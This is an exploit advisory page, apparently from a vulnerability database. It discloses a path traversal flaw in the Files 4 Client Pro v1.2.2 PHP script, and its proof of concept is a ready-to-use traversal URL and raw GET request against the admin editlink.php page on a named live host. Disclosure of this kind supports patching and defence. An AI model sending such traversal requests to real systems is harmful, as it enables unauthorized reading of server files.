Files 4 Client Pro - Easy File Transfer v1.2.2 - Path Traversal

2020.07.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

[+] Exploit Title: Files 4 Client Pro - Easy File Transfer v1.2.2 - Path Traversal [+] Google Dork: [+] Date: 2020-07-30 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: Kevin Schiffer [ https://kevinschiffer.com ] [+] Software Version: 1.2.2 [+] Software Link: https://codecanyon.net/item/files-4-client-pro-easy-file-transfer/8916122 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-22 ### [ Info: ] [i] A Path Traversal (aka Directory Traversal) vulnerability was discovered in the Files 4 Client Pro PHP script through 1.2.2. ### [ PoC: ] [!] http://projects.kevinschiffer.de/files4client-pro/admin/editlink.php?link=/../../../../ [!] GET /files4client-pro/admin/editlink.php?link=/../../../../ HTTP/1.1 Host: projects.kevinschiffer.de ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-30-files-4-client-pro-easy-file-transfer-v1-2-2.txt
https://codecanyon.net/item/files-4-client-pro-easy-file-transfer/8916122


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top